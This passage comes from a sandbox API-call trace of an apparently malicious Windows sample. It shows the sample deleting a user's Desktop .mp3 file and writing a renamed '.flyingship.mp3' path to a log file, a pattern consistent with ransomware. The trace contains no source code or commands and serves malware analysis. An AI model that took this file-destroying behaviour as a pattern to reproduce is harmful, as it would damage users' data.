[0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.964] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.964] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.964] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.965] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.965] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.965] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.965] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.965] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.965] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.965] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.965] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.965] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.965] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.965] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.966] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.966] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0075.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.966] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e3f0 [0075.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76e3f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5c0exzdncgl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.968] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.968] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0075.968] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.969] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb548 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.969] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.969] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0075.969] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.969] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.970] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.970] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x76e1c8 [0075.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76e1c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0075.971] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.972] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.972] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.972] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.972] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.972] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0075.972] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.972] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0075.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.973] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ad30 [0075.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76ad30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.973] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3", lpFilePart=0x0) returned 0x35 [0075.974] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f8d00, ftCreationTime.dwHighDateTime=0x1d5df36, ftLastAccessTime.dwLowDateTime=0xb42994b0, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xca0dfd60, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xb2c5, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="5c0eXZdnCGl.mp3", cAlternateFileName="5C0EXZ~1.MP3")) returned 0x6b89f8 [0075.974] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5c0exzdncgl.mp3")) returned 1 [0075.975] FindNextFileW (in: hFindFile=0x6b89f8, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85f8d00, ftCreationTime.dwHighDateTime=0x1d5df36, ftLastAccessTime.dwLowDateTime=0xb42994b0, ftLastAccessTime.dwHighDateTime=0x1d5db9d, ftLastWriteTime.dwLowDateTime=0xca0dfd60, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xb2c5, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="5c0eXZdnCGl.mp3", cAlternateFileName="5C0EXZ~1.MP3")) returned 0 [0075.976] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.976] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.976] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.976] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.976] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0075.976] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.976] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.977] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.977] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0075.977] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x2d7, lpOverlapped=0x0) returned 1 [0075.977] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0075.977] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.977] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.977] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.977] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0075.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.flyingship.mp3\r\n", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0075.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x43) returned 0x76f100 [0075.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.flyingship.mp3\r\n", cchWideChar=67, lpMultiByteStr=0x76f100, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 67 [0075.977] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.977] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0075.977] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f100 | out: hHeap=0x650000) returned 1 [0075.977] WriteFile (in: hFile=0x140, lpBuffer=0x6d3480*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x6d3480*, lpNumberOfBytesWritten=0x61eef4*=0x42, lpOverlapped=0x0) returned 1 [0075.978] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0075.978] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.978] CloseHandle (hObject=0x140) returned 1 [0075.978] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.978] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.978] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.979] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0075.979] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.979] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.980] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) 